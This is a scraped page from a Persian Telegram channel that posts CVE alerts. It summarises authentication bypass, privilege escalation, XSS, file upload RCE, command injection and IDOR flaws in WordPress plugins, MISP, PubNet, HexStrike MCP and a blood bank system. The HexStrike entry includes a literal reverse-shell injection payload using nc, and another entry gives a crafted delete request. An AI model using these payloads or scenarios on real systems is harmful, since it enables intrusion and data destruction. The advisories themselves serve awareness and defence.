REDTEAM CVE
525 subscribers
1.8K links
سریع‌ترین منبع برای دریافت هشدارهای امنیتی و آسیب‌پذیری‌های جدید (CVE). ما اینترنت را برای شما رصد می‌کنیم
@RedTeamAPT1
@RedTeamAPT_bot
Download Telegram
🚨 New Vulnerability Alert: CVE-2025-13539

🔴 Risk Level: CRITICAL (Score: 9.8)

- تحلیل آسیب‌پذیری امنیتی -
CVE-2025-13539

---

📝 توضیحات آسیب‌پذیری:

آسیب‌پذیری از نوع دور زدن احراز هویت (Authentication Bypass) در پلاگین FindAll Membership برای وردپرس شناسایی شده است. این ضعف امنیتی تمام نسخه‌های این پلاگین تا نسخه 1.0.4 (شامل این نسخه) را تحت تاثیر قرار می‌دهد.

ریشه مشکل در این است که پلاگین پس از تایید هویت کاربر از طریق سرویس‌های گوگل یا فیسبوک (توابع findall_membership_check_google_user و findall_membership_check_facebook_user)، از اطلاعات تایید شده برای ایجاد نشست (Session) و ورود نهایی کاربر به درستی استفاده نمی‌کند. این شکاف به مهاجم اجازه می‌دهد تا فرآیند احراز هویت را دور زده و به جای کاربر اصلی وارد سیستم شود.

---

💥 تاثیرات:

مهاجم غیر احراز هویت شده (Unauthenticated) می‌تواند با بهره‌برداری از این آسیب‌پذیری، به حساب کاربری هر فردی در وب‌سایت، از جمله کاربران مدیر (Administrator)، دسترسی پیدا کند.

این دسترسی به معنای کنترل کامل وب‌سایت است و می‌تواند منجر به عواقب زیر شود:

- سرقت اطلاعات حساس کاربران و وب‌سایت
- تخریب وب‌سایت (Defacement)
- تزریق بدافزار و کدهای مخرب
- ایجاد درهای پشتی (Backdoors) برای دسترسی‌های آتی
- سوءاستفاده از منابع سرور

---

🎭 سناریوی حمله:

یک مهاجم برای بهره‌برداری از این آسیب‌پذیری، مراحل زیر را طی می‌کند:

۱. ابتدا، مهاجم باید آدرس ایمیل یک کاربر با سطح دسترسی بالا (مانند مدیر) را به دست آورد.

۲. سپس، مهاجم یک حساب کاربری عادی یا موقت برای خود در وب‌سایت ایجاد می‌کند (طبق توضیحات رسمی، این قابلیت به صورت پیش‌فرض فعال است).

۳. در مرحله بعد، مهاجم فرآیند ورود از طریق گوگل یا فیسبوک را آغاز کرده و در این فرآیند، ایمیل کاربر مدیر را وارد می‌کند.

۴. به دلیل وجود نقص منطقی در پلاگین، سیستم پس از یک بررسی اولیه، به اشتباه نشست کاربری را برای حساب مدیر ایجاد کرده و مهاجم را با اختیارات کامل مدیر وارد وب‌سایت می‌کند، بدون آنکه نیاز به تایید هویت واقعی از سمت گوگل یا فیسبوک باشد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-13540

🔴 Risk Level: CRITICAL (Score: 9.8)

تحلیل و گزارش آسیب‌پذیری | CVE-2025-13540

شرح آسیب‌پذیری:
یک آسیب‌پذیری از نوع افزایش سطح دسترسی (Privilege Escalation) در افزونه Tiare Membership برای وردپرس شناسایی شده است. این آسیب‌پذیری تمامی نسخه‌های 1.2 و پایین‌تر را تحت تاثیر قرار می‌دهد.

نقص امنیتی در تابع tiare_membership_init_rest_api_register وجود دارد. این تابع هنگام ثبت‌نام یک کاربر جدید، نقش کاربری (User Role) ارسال شده را به درستی اعتبارسنجی نمی‌کند. در نتیجه، یک کاربر غیرمجاز می‌تواند در حین فرآیند ثبت‌نام، هر نقشی را برای حساب کاربری خود انتخاب کند.

تاثیر:
مهاجم بدون نیاز به احراز هویت (Unauthenticated) می‌تواند با ثبت یک حساب کاربری جدید و اختصاص نقش administrator به آن، کنترل کامل وب‌سایت را به دست آورد.

این سطح از دسترسی به مهاجم اجازه می‌دهد تا اطلاعات حساس را سرقت کند، بدافزار تزریق کند، محتوای سایت را تغییر داده، کاربران دیگر را حذف کرده و یا سایت را به طور کامل از دسترس خارج کند.

سناریو:
۱. مهاجم فرم ثبت‌نام وب‌سایتی را که از نسخه آسیب‌پذیر افزونه استفاده می‌کند، شناسایی می‌کند.

۲. مهاجم با ارسال یک درخواست ثبت‌نام (معمولاً از طریق REST API)، در کنار اطلاعاتی مانند نام کاربری و رمز عبور، پارامتر مربوط به نقش کاربری را با مقدار administrator ارسال می‌کند.

۳. به دلیل عدم وجود مکانیزم اعتبارسنجی در تابع آسیب‌پذیر، سیستم یک حساب کاربری جدید با بالاترین سطح دسترسی (مدیر کل) برای مهاجم ایجاد می‌کند.

۴. مهاجم اکنون می‌تواند با حساب کاربری ایجاد شده وارد پنل مدیریت شده و کنترل کامل سایت را در اختیار بگیرد.

---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-13675

🔴 Risk Level: CRITICAL (Score: 9.8)

تحلیل آسیب‌پذیری: CVE-2025-13675
افزایش سطح دسترسی در قالب وردپرس Tiger

---

📜 توضیحات آسیب‌پذیری:

این آسیب‌پذیری از نوع افزایش سطح دسترسی (Privilege Escalation) در قالب Tiger برای وردپرس، در تمام نسخه‌های موجود تا نسخه 101.2.1 (شامل این نسخه) وجود دارد.

نقطه ضعف اصلی در فایل paypal-submit.php قرار دارد که هنگام ثبت‌نام کاربر جدید، نقش کاربری (User Role) ارسالی توسط کاربر را به درستی اعتبارسنجی و محدود نمی‌کند.

💥 تأثیر:

یک مهاجم غیر احراز هویت شده (Unauthenticated) می‌تواند با سوءاستفاده از این ضعف، یک حساب کاربری با بالاترین سطح دسترسی، یعنی administrator، برای خود ایجاد کند.

این امر به مهاجم کنترل کامل وب‌سایت را می‌دهد و امکان انجام هرگونه عملیات مخرب، از جمله سرقت اطلاعات حساس، تغییر محتوای سایت، نصب بدافزار و یا حذف کامل وب‌سایت را فراهم می‌آورد.

🎭 سناریوی حمله:

۱. مهاجم یک وب‌سایت را که از نسخه آسیب‌پذیر قالب Tiger استفاده می‌کند، شناسایی می‌کند.

۲. یک درخواست ثبت‌نام به فایل paypal-submit.php ارسال می‌کند.

۳. در پارامترهای این درخواست، مقدار مربوط به نقش کاربری را برابر با administrator قرار می‌دهد.

۴. سیستم بدون هیچ‌گونه اعتبارسنجی، درخواست را پردازش کرده و یک حساب کاربری جدید با دسترسی کامل مدیریتی ایجاد می‌کند.

۵. اکنون مهاجم می‌تواند با اطلاعات حساب کاربری جدید وارد پیشخوان وردپرس شده و کنترل کامل سایت را در دست بگیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-13680

🟠 Risk Level: HIGH (Score: 8.8)

تحلیل آسیب‌پذیری | CVE-2025-13680
ارتقاء سطح دسترسی در قالب Tiger وردپرس

---

🐞 توضیحات آسیب‌پذیری:

یک آسیب‌پذیری از نوع ارتقاء سطح دسترسی (Privilege Escalation) با شناسه CVE-2025-13680 در قالب Tiger برای سیستم مدیریت محتوای وردپرس شناسایی شده است. این ضعف امنیتی تمامی نسخه‌های این قالب تا نسخه 101.2.1 (شامل این نسخه) را تحت تأثیر قرار می‌دهد.

ریشه این مشکل در عدم اعتبارسنجی و کنترل دسترسی مناسب بر روی تابع $user->set_role() است. این تابع به کاربران اجازه می‌دهد نقش کاربری خود را در سیستم تغییر دهند. در نتیجه، یک مهاجم احرازهویت‌شده با حداقل سطح دسترسی (مانند نقش Subscriber) می‌تواند از این ضعف سوءاستفاده کرده و سطح دسترسی خود را به مدیر کل (Administrator) ارتقاء دهد.


💥 تأثیر:

بهره‌برداری موفق از این آسیب‌پذیری به مهاجم اجازه می‌دهد تا کنترل کامل وب‌سایت وردپرسی را در دست بگیرد. پس از دریافت دسترسی مدیریتی، مهاجم قادر خواهد بود اقدامات مخرب زیر را انجام دهد:

- نصب افزونه‌های مخرب و شل‌های تحت وب (Web Shells).
- ایجاد، حذف یا تغییر تمامی محتوای وب‌سایت.
- ایجاد کاربران مدیر جدید برای حفظ دسترسی.
- سرقت اطلاعات حساس کاربران، از جمله اطلاعات شخصی و رمزهای عبور.
- تزریق بدافزار و هدایت کاربران به وب‌سایت‌های فیشینگ.

در عمل، این آسیب‌پذیری می‌تواند منجر به از دست رفتن کامل محرمانگی، یکپارچگی و در دسترس بودن وب‌سایت شود.


🎭 سناریو:

یک سناریوی حمله به شرح زیر است:

۱. مهاجم با ثبت‌نام در وب‌سایت هدف، یک حساب کاربری عادی با نقش Subscriber ایجاد می‌کند.

۲. سپس با تحلیل کدهای قالب یا ارسال درخواست‌های دستکاری‌شده، نقطه‌ای را که تابع $user->set_role() بدون بررسی سطح دسترسی کاربر فعلی فراخوانی می‌شود، شناسایی می‌کند.

۳. مهاجم درخواستی را به سرور ارسال می‌کند و در پارامتر مربوط به نقش کاربری، مقدار administrator را تنظیم می‌نماید.

۴. به دلیل نبود کنترل‌های امنیتی لازم، سیستم درخواست را معتبر دانسته و نقش کاربری مهاجم را به مدیر کل تغییر می‌دهد. از این لحظه به بعد، مهاجم کنترل کامل وب‌سایت را در اختیار دارد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-66359

🟠 Risk Level: HIGH (Score: 8.5)

🔬 تحلیل آسیب‌پذیری: CVE-2025-66359
Logpoint SIEM - Cross-Site Scripting (XSS)

---

🔬 توضیحات آسیب‌پذیری:

یک آسیب‌پذیری از نوع Cross-Site Scripting (XSS) در پلتفرم Logpoint و در نسخه‌های پیش از 7.7.0 شناسایی شده است. این ضعف امنیتی ناشی از عدم اعتبارسنجی کافی داده‌های ورودی و همچنین عدم خروجی‌سازی مناسب (Output Escaping) در چندین بخش از رابط کاربری این نرم‌افزار است.

این شرایط به یک مهاجم اجازه می‌دهد تا با تزریق اسکریپت‌های مخرب در سمت کلاینت (مرورگر)، کدهای دلخواه خود را در بستر نشست (Session) کاربری قربانی اجرا نماید.

💥 تأثیرات:

مهاجم با بهره‌برداری موفق از این آسیب‌پذیری قادر خواهد بود اقدامات زیر را انجام دهد:

▪️ سرقت نشست‌های کاربری (Session Hijacking)، به خصوص حساب‌های با دسترسی بالا مانند مدیران سیستم.
▪️ سرقت اطلاعات حساس نمایش داده شده در پنل Logpoint، مانند لاگ‌ها و گزارشات امنیتی.
▪️ اجرای حملات فیشینگ برای به سرقت بردن اطلاعات ورود کاربران.
▪️ تغییر و دستکاری ظاهر رابط کاربری به منظور فریب کاربر یا ایجاد اختلال.
▪️ هدایت کاربر به وب‌سایت‌های مخرب.

🎭 سناریوی حمله:

۱. مهاجم یک اسکریپت مخرب (Payload) را در داده‌ای که قرار است توسط Logpoint پردازش و ذخیره شود، تزریق می‌کند. این داده می‌تواند بخشی از یک لاگ، یک هدر HTTP یا هر ورودی دیگری باشد که در پنل نمایش داده می‌شود.

۲. پلتفرم Logpoint این داده آلوده را بدون پاکسازی و اعتبارسنجی مناسب دریافت و در پایگاه داده خود ذخیره می‌کند.

۳. هنگامی که یک کاربر معتبر (مانند یک تحلیلگر امنیتی) وارد پنل وب Logpoint شده و صفحه‌ای که حاوی این داده مخرب است را مشاهده می‌کند (برای مثال، در بخش جستجوی لاگ‌ها یا داشبوردها)، مرورگر کاربر اسکریپت تزریق شده را به عنوان کدی معتبر اجرا می‌کند.

۴. در نتیجه، اسکریپت مخرب در مرورگر قربانی اجرا شده و می‌تواند منجر به سرقت کوکی نشست (Session Cookie) او و در اختیار گرفتن کامل حساب کاربری‌اش شود.

---

🛡️ راهکار و پیشنهاد امنیتی:

به تمامی مدیران سیستم و کاربران Logpoint اکیداً توصیه می‌شود در اسرع وقت نسبت به به‌روزرسانی پلتفرم خود به نسخه 7.7.0 یا بالاتر اقدام نمایند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-58303

🟠 Risk Level: HIGH (Score: 8.4)

🔬 شرح آسیب‌پذیری:

یک آسیب‌پذیری از نوع Use-After-Free (UAF) با شناسه CVE-2025-58303 در ماژول مربوط به فریم‌ورک ضبط صفحه نمایش (Screen Recording) شناسایی شده است.

این نقص امنیتی زمانی رخ می‌دهد که برنامه پس از آزاد کردن یک بخش از حافظه، همچنان تلاش می‌کند از آن استفاده کند. این امر منجر به خرابی حافظه و رفتار غیرقابل پیش‌بینی در برنامه می‌شود.

💥 میزان تأثیر:

بهره‌برداری موفق از این آسیب‌پذیری می‌تواند به طور مستقیم بر در دسترس بودن (Availability) سیستم تأثیر بگذارد.

در بدترین حالت، این نقص امنیتی می‌تواند منجر به یک حمله محروم‌سازی از سرویس (Denial of Service - DoS) شود. این امر با از کار انداختن فرآیند ضبط صفحه یا حتی کل رابط کاربری سیستم، دستگاه را غیرقابل استفاده کرده و کاربر را مجبور به راه‌اندازی مجدد آن می‌کند.

🎬 سناریوی حمله:

مهاجم می‌تواند یک اپلیکیشن مخرب طراحی کند که از کاربر درخواست مجوز برای ضبط صفحه نمایش را می‌نماید.

پس از دریافت مجوز، اپلیکیشن با ارسال داده‌های دستکاری‌شده و غیرمنتظره به فریم‌ورک ضبط صفحه، باعث ایجاد یک وضعیت Use-After-Free می‌شود. این عمل با مجبور کردن سیستم به آزاد کردن حافظه در حین استفاده از آن صورت می‌گیرد. در نتیجه، سرویس مربوطه دچار اختلال شده و از کار می‌افتد (Crash) و در نهایت منجر به قفل شدن یا راه‌اندازی مجدد دستگاه می‌شود.

---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-58302

🟠 Risk Level: HIGH (Score: 8.4)

تحلیل آسیب‌پذیری: CVE-2025-58302

شرح آسیب‌پذیری:
آسیب‌پذیری با شناسه CVE-2025-58302 به یک نقص امنیتی جدی در بخش کنترل دسترسی‌ها (Permission Control) در ماژول تنظیمات اشاره دارد. این ضعف به یک عامل مخرب اجازه می‌دهد تا محدودیت‌های امنیتی تعریف‌شده را دور زده و به بخش‌هایی از تنظیمات دسترسی پیدا کند که در حالت عادی مجاز به مشاهده یا تغییر آن‌ها نیست.

تأثیرات و پیامدها:
مهم‌ترین پیامد بهره‌برداری موفق از این آسیب‌پذیری، نقض محرمانگی اطلاعات (Confidentiality) است. این امر می‌تواند منجر به افشای داده‌های حساس کاربران، تنظیمات محرمانه سرویس، یا اطلاعات شخصی ذخیره‌شده در برنامه شود. در نتیجه، حریم خصوصی کاربران به خطر افتاده و امکان سوءاستفاده از اطلاعات فاش‌شده توسط مهاجمان وجود خواهد داشت.

سناریوی حمله:
یک مهاجم با دسترسی سطح پایین به سیستم (یا از طریق یک اپلیکیشن مخرب نصب‌شده روی دستگاه کاربر) را در نظر بگیرید. مهاجم با ارسال یک درخواست دستکاری‌شده و خاص به ماژول تنظیمات، از این نقص بهره‌برداری می‌کند. به دلیل ضعف در مکانیزم بررسی مجوزها، سیستم قادر به تشخیص درخواست غیرمجاز نبوده و در نتیجه، دسترسی به یک بخش محافظت‌شده از تنظیمات را برای مهاجم فراهم می‌کند. برای مثال، مهاجم ممکن است بتواند به اطلاعاتی مانند توکن‌های احراز هویت (Session Tokens) یا داده‌های خصوصی کاربر دسترسی پیدا کرده و آن‌ها را استخراج نماید.

---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-66384

🟠 Risk Level: HIGH (Score: 8.2)

تحلیل آسیب‌پذیری | CVE-2025-66384

🐞 توضیحات آسیب‌پذیری:
آسیب‌پذیری با شناسه CVE-2025-66384 در پلتفرم اشتراک‌گذاری اطلاعات بدافزار (MISP) در نسخه‌های قبل از 2.5.24 شناسایی شده است. نقص اصلی در فایل app/Controller/EventsController.php قرار دارد و به دلیل وجود منطق نادرست در فرآیند اعتبارسنجی فایل‌های آپلود شده به وجود آمده است. به طور خاص، نحوه بررسی فایل موقت (tmp_name) در هنگام آپلود ضعیف بوده و به یک مهاجم اجازه می‌دهد تا مکانیزم‌های امنیتی را دور زده و یک فایل مخرب را بارگذاری کند.

⚠️ تأثیر:
بهره‌برداری موفقیت‌آمیز از این آسیب‌پذیری می‌تواند منجر به اجرای کد از راه دور (RCE) بر روی سرور میزبان MISP شود. این بدان معناست که یک مهاجم می‌تواند کنترل کامل سرور را به دست آورد، به تمام اطلاعات حساس و طبقه‌بندی‌شده ذخیره شده در پلتفرم (مانند شاخص‌های نفوذ - IoC) دسترسی پیدا کرده، آن‌ها را سرقت یا دستکاری کند و یا از سرور آلوده به عنوان نقطه‌ای برای حملات بیشتر به زیرساخت شبکه داخلی سازمان استفاده نماید.

🎬 سناریو:
یک مهاجم با داشتن یک حساب کاربری معتبر در پلتفرم MISP، یک فایل مخرب (به عنوان مثال، یک وب‌شل با پسوند PHP) را با نامی فریبنده شبیه به یک فایل تصویر (مثلاً report.jpg) آماده می‌کند. سپس، مهاجم وارد بخش ایجاد یا ویرایش یک "رویداد" (Event) شده و فایل مخرب خود را به عنوان ضمیمه آپلود می‌کند. به دلیل نقص منطقی در کد، سیستم قادر به تشخیص ماهیت واقعی فایل نیست و آن را در یک مسیر قابل دسترس بر روی سرور ذخیره می‌کند. در نهایت، مهاجم با فراخوانی مستقیم آدرس فایل آپلود شده از طریق مرورگر، کدهای مخرب را اجرا کرده و به سرور دسترسی کامل پیدا می‌کند.

---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-65112

🔴 Risk Level: CRITICAL (Score: 9.4)

تحلیل آسیب‌پذیری CVE-2025-65112 در سرویس PubNet

---

شرح آسیب‌پذیری:

آسیب‌پذیری با شناسه CVE-2025-65112 در سرویس میزبانی پکیج‌های Dart و Flutter به نام PubNet شناسایی شده است. در نسخه‌های قبل از 1.1.3، نقطه پایانی (endpoint) به آدرس /api/storage/upload به کاربران احرازهویت‌نشده اجازه می‌دهد تا با ارسال یک شناسه نویسنده (author-id) دلخواه، پکیج‌هایی را به نام هر کاربر دیگری آپلود کنند.

این نقص امنیتی به دلیل عدم اعتبارسنجی صحیح هویت کاربر در هنگام آپلود پکیج رخ می‌دهد و به مهاجمان اجازه می‌دهد خود را به عنوان توسعه‌دهندگان معتبر جا بزنند. نسخه 1.1.3 این مشکل را برطرف کرده است.

تأثیرات:

بهره‌برداری موفق از این آسیب‌پذیری می‌تواند منجر به عواقب جدی زیر شود:

▪️ جعل هویت (Identity Spoofing): مهاجم می‌تواند با جعل هویت یک توسعه‌دهنده معتبر، پکیج‌های مخرب را منتشر کرده و اعتماد سایر کاربران را جلب کند.

▪️ افزایش سطح دسترسی (Privilege Escalation): یک کاربر غیرمجاز می‌تواند با آپلود پکیج به نام یک کاربر با دسترسی بالاتر (مانند مدیر)، عملاً به سطح دسترسی او در اکوسیستم مدیریت پکیج دست یابد.

▪️ حملات زنجیره تأمین (Supply Chain Attacks): این جدی‌ترین پیامد است. با تزریق پکیج‌های آلوده به مخزن، پروژه‌های دیگری که از این پکیج‌ها به عنوان وابستگی (dependency) استفاده می‌کنند، در معرض خطر قرار گرفته و بدافزار به طور گسترده در زنجیره تأمین نرم‌افزار پخش می‌شود.

سناریوی حمله:

یک سناریوی حمله محتمل به شرح زیر است:

۱. مهاجم یک سرور PubNet را که از نسخه‌ای قدیمی‌تر از 1.1.3 استفاده می‌کند، شناسایی می‌کند.

۲. مهاجم شناسه کاربری (author-id) یک توسعه‌دهنده معتبر و شناخته‌شده در آن سرور را به دست می‌آورد.

۳. سپس، یک نسخه مخرب از یکی از پکیج‌های محبوب آن توسعه‌دهنده ایجاد می‌کند و یک بدافزار (مثلاً یک ابزار سرقت اطلاعات) را در آن جاسازی می‌کند.

۴. مهاجم یک درخواست به نقطه پایانی /api/storage/upload ارسال کرده و ضمن آپلود پکیج آلوده، شناسه توسعه‌دهنده معتبر را به عنوان author-id در درخواست خود مشخص می‌کند.

۵. سرور PubNet بدون بررسی هویت واقعی آپلودکننده، پکیج را می‌پذیرد و آن را به عنوان یک نسخه جدید و قانونی از پکیج اصلی منتشر می‌کند.

۶. سایر توسعه‌دهندگان و سیستم‌های CI/CD به صورت خودکار این «به‌روزرسانی» را دریافت کرده و ناآگاهانه کد مخرب را در پروژه‌های خود وارد می‌کنند و باعث یک نفوذ گسترده می‌شوند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-13615

🔴 Risk Level: CRITICAL (Score: 9.8)

تحلیل آسیب‌پذیری CVE-2025-13615

با سلام و احترام، گزارش تحلیل آسیب‌پذیری جدید در افزونه وردپرس به شرح زیر ارائه می‌گردد:

آسیب‌پذیری:
آسیب‌پذیری از نوع تغییر رمز عبور произвольный کاربر (Arbitrary User Password Change) در افزونه StreamTube Core برای وردپرس شناسایی شده است. این ضعف امنیتی تمام نسخه‌های 4.78 و قدیمی‌تر را تحت تأثیر قرار می‌دهد.

علت اصلی این آسیب‌پذیری، نقص در کنترل دسترسی به آبجکت‌های کاربری است. این نقص به یک مهاجم احراز هویت نشده اجازه می‌دهد تا مکانیزم‌های مجوزدهی را دور زده و به منابع سیستمی، از جمله اطلاعات حساب‌های کاربری، دسترسی پیدا کند.

نکته مهم: بهره‌برداری از این آسیب‌پذیری تنها در صورتی امکان‌پذیر است که گزینه "فیلدهای رمز عبور ثبت‌نام" (registration password fields) در تنظیمات پوسته فعال باشد.

تأثیر:
سطح تأثیر این آسیب‌پذیری بحرانی (Critical) ارزیابی می‌شود. یک مهاجم می‌تواند بدون نیاز به نام کاربری و رمز عبور، رمز عبور هر کاربری را در وب‌سایت، از جمله حساب administrator (مدیر کل)، تغییر دهد.

پیامدهای اصلی عبارتند از:
- تصاحب کامل حساب کاربری (Account Takeover): مهاجم کنترل کامل حساب کاربری قربانی را به دست می‌گیرد.
- دسترسی کامل به وب‌سایت: در صورت هدف قرار دادن حساب مدیر، مهاجم کنترل کامل وب‌سایت را به دست می‌آورد.
- سرقت اطلاعات: امکان دسترسی و سرقت اطلاعات حساس کاربران و وب‌سایت.
- تخریب و آسیب به اعتبار: مهاجم می‌تواند محتوای سایت را تغییر دهد، بدافزار تزریق کند یا وب‌سایت را از دسترس خارج نماید.

سناریو حمله:
یک سناریوی محتمل برای بهره‌برداری از این آسیب‌پذیری به شرح زیر است:

۱. مهاجم یک وب‌سایت وردپرسی را که از نسخه آسیب‌پذیر افزونه StreamTube Core استفاده می‌کند، شناسایی می‌کند.

۲. مهاجم بررسی می‌کند که آیا گزینه "فیلدهای رمز عبور ثبت‌نام" در تنظیمات پوسته فعال است یا خیر.

۳. مهاجم یک درخواست دستکاری‌شده (malicious request) به سمت وب‌سایت ارسال می‌کند. این درخواست حاوی نام کاربری قربانی (مثلاً admin) و رمز عبور جدید مورد نظر مهاجم است.

۴. به دلیل نقص در منطق برنامه، افزونه این درخواست را بدون بررسی هویت و مجوز درخواست‌کننده پردازش می‌کند.

۵. رمز عبور حساب کاربری مورد نظر (مثلاً admin) به رمز عبور جدیدی که مهاجم ارسال کرده، تغییر می‌یابد.

۶. در نهایت، مهاجم با استفاده از نام کاربری و رمز عبور جدید وارد سیستم شده و کنترل کامل حساب را به دست می‌گیرد.

---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
👾1
🚨 New Vulnerability Alert: CVE-2025-35028

🔴 Risk Level: CRITICAL (Score: 9.1)

تحلیل آسیب‌پذیری | CVE-2025-35028
#Vulnerability #RCE #CommandInjection

---

📝 شرح آسیب‌پذیری:
یک آسیب‌پذیری حیاتی از نوع تزریق دستور (Command Injection) در کلاس EnhancedCommandExecutor مربوط به سرور HexStrike AI MCP شناسایی شده است. این مشکل در نسخه مربوط به کامیت 2f3a5512 (سپتامبر ۲۰۲۵) وجود دارد.

این آسیب‌پذیری به مهاجم اجازه می‌دهد با ارسال یک آرگومان خط فرمان که با کاراکتر سمی‌کالن (;) شروع می‌شود به یکی از نقاط پایانی API (API endpoint)، دستورات دلخواه خود را بر روی سرور اجرا کند. در پیکربندی پیش‌فرض، سرور هیچ‌گونه پاک‌سازی (Sanitization) یا اعتبارسنجی روی این ورودی‌ها انجام نمی‌دهد و دستور مخرب مستقیماً به پوسته سیستم‌عامل (Shell) ارسال می‌شود.

💥 تاثیرات:
مهم‌ترین پیامد این آسیب‌پذیری، اجرای کد از راه دور (Remote Code Execution - RCE) با بالاترین سطح دسترسی ممکن است. از آنجایی که سرور MCP معمولاً با دسترسی کاربر root اجرا می‌شود، بهره‌برداری موفق از این حفره امنیتی به مهاجم کنترل کامل سرور را می‌دهد.

تاثیرات بالقوه شامل موارد زیر است:
- سرقت، تغییر یا حذف کامل داده‌های حساس.
- نصب بدافزار، روت‌کیت یا ایجاد درهای پشتی (Backdoor).
- استفاده از سرور قربانی برای حمله به سایر سیستم‌های داخل شبکه.
- از کار انداختن کامل سرویس (Denial of Service).

🎭 سناریوی حمله:
یک مهاجم، API endpoint آسیب‌پذیر را شناسایی کرده و یک درخواست مخرب ایجاد می‌کند. در این درخواست، یکی از آرگومان‌های ارسالی به شکل زیر خواهد بود:
; nc -e /bin/bash 192.168.1.100 4444

سرور MCP این ورودی را بدون هیچ‌گونه بررسی دریافت کرده و یک دستور سیستمی مشابه زیر را در سمت سرور ترکیب و اجرا می‌کند:
/path/to/tool --parameter 'some_value' ; nc -e /bin/bash 192.168.1.100 4444

به دلیل وجود کاراکتر ;، سیستم‌عامل دستور اول را خاتمه داده و دستور دوم (ایجاد یک reverse shell به سمت مهاجم) را به عنوان یک دستور کاملاً مجزا با دسترسی root اجرا می‌کند. در نتیجه، مهاجم یک شل با دسترسی کامل روی سرور هدف به دست می‌آورد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-63525

🔴 Risk Level: CRITICAL (Score: 9.6)

گزارش تحلیل آسیب‌پذیری: CVE-2025-63525

🚨 شرح آسیب‌پذیری:

آسیب‌پذیری با شناسه CVE-2025-63525 در سیستم مدیریت بانک خون نسخه 1.0 شناسایی شده است. این ضعف امنیتی از نوع "افزایش سطح دسترسی" (Privilege Escalation) است. یک مهاجم که به سیستم دسترسی احرازهویت‌شده (Authenticated) دارد، حتی با کمترین سطح دسترسی، می‌تواند با ارسال یک درخواست دستکاری‌شده به فایل delete.php، اقدام به حذف رکوردهایی کند که مجوز آن را ندارد.

ریشه مشکل در عدم بررسی صحیح مجوزهای کاربر درخواست‌دهنده توسط اسکریپت delete.php است. در واقع، سیستم فقط "هویت" کاربر را بررسی می‌کند نه "اختیارات" او را برای انجام عمل حذف.

💥 میزان تأثیر:

بهره‌برداری موفق از این آسیب‌پذیری می‌تواند منجر به پیامدهای جدی شود:

یکپارچگی داده‌ها: مهاجم قادر خواهد بود اطلاعات حیاتی مانند سوابق اهداکنندگان، موجودی بانک خون، یا حتی حساب‌های کاربری دیگر (شامل مدیران) را به صورت غیرمجاز حذف کند.

ممانعت از سرویس (DoS): با حذف داده‌های کلیدی یا حساب‌های کاربری اصلی، عملکرد کل سیستم مختل شده و از دسترس کاربران قانونی خارج می‌شود.

پتانسیل حملات بیشتر: این آسیب‌پذیری می‌تواند به عنوان نقطه‌ای برای حملات زنجیره‌ای مورد استفاده قرار گیرد و امنیت کلی سیستم را به خطر اندازد.

---

🎭 سناریوی حمله:

۱. مهاجم یک حساب کاربری با سطح دسترسی پایین در سیستم مدیریت بانک خون ثبت می‌کند.

۲. پس از ورود به سیستم، با ابزارهای مانیتورینگ ترافیک، درخواست‌های ارسالی به سرور را تحلیل می‌کند و متوجه می‌شود که عملیات حذف از طریق فایلی به نام delete.php و با یک پارامتر ID (مثلاً id=123) انجام می‌شود.

۳. مهاجم با حدس زدن یا شمارش (Enumeration)، شناسه‌ی (ID) رکوردهای مهمی را که به آن‌ها دسترسی ندارد (مانند سوابق بیماران یا کاربران دیگر) پیدا می‌کند.

۴. سپس یک درخواست HTTP دستکاری‌شده را مستقیماً به سرور ارسال می‌کند. برای مثال، برای حذف رکورد یک کاربر دیگر با شناسه 456، درخواستی مشابه زیر ارسال می‌کند:
GET /delete.php?user_id=456

۵. از آنجایی که اسکریپت delete.php سطح دسترسی کاربر را برای حذف رکورد با شناسه 456 بررسی نمی‌کند، درخواست مخرب را پردازش کرده و رکورد مورد نظر را حذف می‌کند. به این ترتیب، مهاجم با موفقیت یکپارچگی داده‌های سیستم را نقض می‌کند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-63531

🔴 Risk Level: CRITICAL (Score: 10.0)

🔎 شرح آسیب‌پذیری:

یک آسیب‌پذیری از نوع تزریق SQL با شناسه CVE-2025-63531 در سیستم مدیریت بانک خون نسخه 1.0 شناسایی شده است.

این ضعف امنیتی در کامپوننت receiverLogin.php وجود دارد. مشکل اصلی، عدم پاکسازی و اعتبارسنجی صحیح ورودی‌های کاربر در فیلدهای remail و rpassword است. در نتیجه، یک مهاجم می‌تواند با ارسال مقادیر دستکاری‌شده، کدهای SQL دلخواه خود را به کوئری پایگاه داده تزریق کند.

---

⚠️ تأثیر:

